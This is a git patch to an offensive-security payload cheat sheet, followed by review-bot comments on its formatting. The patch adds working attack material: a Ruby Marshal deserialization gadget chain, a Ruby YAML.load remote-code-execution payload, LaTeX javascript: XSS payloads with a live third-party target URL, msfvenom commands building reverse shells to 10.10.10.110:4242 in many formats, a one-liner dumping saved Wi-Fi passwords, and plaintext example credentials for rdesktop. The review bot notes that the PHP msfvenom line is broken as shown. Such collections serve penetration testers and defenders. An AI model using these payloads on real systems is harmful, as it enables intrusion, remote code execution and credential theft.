From 2d5b4f21933d632c489baa575c0d3537982a8690 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 3 Mar 2019 16:31:17 +0100 Subject: [PATCH] Meterpreter generate + LaTeK XSS + Ruby Yaml --- Insecure deserialization/Ruby.md | 25 +++++++++++++++++++ LaTeX injection/README.md | 10 ++++++++ .../Metasploit - Cheatsheet.md | 16 ++++++++++++ .../Windows - Privilege Escalation.md | 6 +++++ .../Windows - Using credentials.md | 3 ++- Upload insecure files/README.md | 3 +++ 6 files changed, 62 insertions(+), 1 deletion(-) diff --git a/Insecure deserialization/Ruby.md b/Insecure deserialization/Ruby.md index bf338863..62635261 100644 --- a/Insecure deserialization/Ruby.md +++ b/Insecure deserialization/Ruby.md 
@@ -1,12 +1,37 @@ # Ruby Deserialization +## Marshal.load + Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5 ```ruby for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done ``` +## Yaml.load + +Vulnerable code +```ruby +require "yaml" +YAML.load(File.read("p.yml")) +``` + +Exploitation code +```ruby +--- !ruby/object:Gem::Requirement +requirements: + !ruby/object:Gem::DependencyList + specs: + - !ruby/object:Gem::Source::SpecificFile + spec: &1 !ruby/object:Gem::StubSpecification + loaded_from: "|id 1>&2" + - !ruby/object:Gem::Source::SpecificFile + spec: +``` + + ## References - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) +- [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/) - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) \ No newline at end of file diff --git a/LaTeX injection/README.md b/LaTeX injection/README.md index 6a02010f..5cce2b7a 100644 --- a/LaTeX injection/README.md +++ b/LaTeX injection/README.md 
@@ -66,6 +66,16 @@ If you get any LaTex error, consider using base64 to get the result without bad \input{|"/bin/hostname"} ``` +## Cross Site Scripting + +From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) +```bash +\url{javascript:alert(1)} +\href{javascript:alert(1)}{placeholder} +``` + +Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$` + ## References * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/) diff --git a/Methodology and Resources/Metasploit - Cheatsheet.md b/Methodology and Resources/Metasploit - Cheatsheet.md index 6438f7a0..013d5ac6 100644 --- a/Methodology and Resources/Metasploit - Cheatsheet.md +++ b/Methodology and Resources/Metasploit - Cheatsheet.md @@ -45,6 +45,21 @@ exploit -j ## Meterpreter - Basic +### Generate a meterpreter + +```powershell +$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe +$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho +$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war +$ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py +$ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh +$ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl +``` + ### SYSTEM / Administrator privilege ```powershell 
@@ -161,3 +176,4 @@ Add-WebTransport -Url http(s)://:/ -RetryWait 10 -RetryTotal 3 ## References * [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/) +* [Creating Metasploit Payloads - Peleus](https://netsec.ws/?p=331) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index d9c96f89..9a414df1 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -258,6 +258,12 @@ Get Cleartext Pass netsh wlan show profile key=clear ``` +Oneliner method to extract wifi passwords from all the access point. + +````batch +cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on +``` + ## Processes Enumeration and Tasks What processes are running? diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index e5486951..ffe4ae87 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -93,7 +93,8 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 ```powershell python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 -rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 +rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 -g 70% +# -g : the screen will take up 70% of your actual screen size ``` Note: you may need to enable it with the following command diff --git a/Upload insecure files/README.md b/Upload insecure files/README.md index 35d7fb5c..809fba82 100644 --- a/Upload insecure files/README.md +++ b/Upload insecure files/README.md 
@@ -2,6 +2,9 @@ Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. +## Tools +- [Fuxploider](https://github.com/almandin/fuxploider) + ## Exploits ### PHP Extension
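Review bot: In the Insecure deserialization/Ruby.md hunk the `## Marshal.load` block is fenced as ```ruby but its content is a bash loop (`for i in {0..5}; do docker run -it ruby:2.${i} ruby -e '...'; done`), and the `rescue nil` inside the one-liner silently drops any exception, so a version on which the chain breaks looks identical to one where it simply printed nothing; tag the fence `bash` and say that success is judged by the `id` output on stderr. In the `## Yaml.load` section the heading spells the constant `Yaml.load` while the code calls `YAML.load`; the exploitation payload is YAML fenced as ```ruby and its last entry stops at `spec:` with no value, so a reader cannot tell whether the second `Gem::Source::SpecificFile` is deliberately empty or was cut off. Tag that fence `yaml`, use `YAML.load` in the heading, and state whether the trailing `spec:` is intentional. Since the vulnerable snippet is just `YAML.load(File.read("p.yml"))`, one line noting the fix (`YAML.safe_load`, which rejects `!ruby/object` tags unless explicitly permitted) would make the section useful for defenders as well.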
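Review bot: In the LaTeX injection/README.md hunk the two payloads `\url{javascript:alert(1)}` and `\href{javascript:alert(1)}{placeholder}` are LaTeX but the fence is tagged ```bash; tag it `latex`. The attribution reads "From @EdOverflow" while the link is a status on the intigriti account (`twitter.com/intigriti/status/...`), so either the handle or the URL is wrong. The "Live example" points at a third-party host (`payontriage.com`), which gives the reader nothing reproducible once that page changes; state which LaTeX-to-HTML renderer the `$\href{...}{...}$` form was confirmed against so the section still works without the live target.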
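Review bot: In the Metasploit - Cheatsheet.md hunk the `### Generate a meterpreter` block is fenced as ```powershell but every line is a `$`-prompted Unix shell command, and the PHP line depends on macOS `pbcopy`/`pbpaste`; tag it `bash` and note the macOS-only dependency. That PHP line is also broken as shown: `echo ' shell.php && pbpaste >> shell.php` opens a single quote that is never closed, so a shell will wait for more input instead of writing the file; if the intent is to prepend an opening `<?php` tag before the raw payload, close the quote, e.g. `echo '<?php ' > shell.php && pbpaste >> shell.php`. Finally, the heading promises a meterpreter but `osx/x86/shell_reverse_tcp`, `java/jsp_shell_reverse_tcp`, `cmd/unix/reverse_python`, `cmd/unix/reverse_bash` and `cmd/unix/reverse_perl` are plain reverse shells, not meterpreter stagers; rename the heading to "Generate a payload" or split the list so readers know which lines need `multi/handler` with a meterpreter payload set.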
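Review bot: In the Windows - Privilege Escalation.md hunk the wifi one-liner opens its fence with four backticks (````batch) and closes with three, so the code block never closes in Markdown and everything from `## Processes Enumeration and Tasks` onward renders inside it; use three backticks on both sides. The loop variable is written `%a`, which is the interactive cmd prompt form; inside a .bat/.cmd file it must be `%%a`, so say explicitly that the line is meant to be pasted at a cmd prompt. The lead sentence "extract wifi passwords from all the access point" should read "from all saved access point profiles".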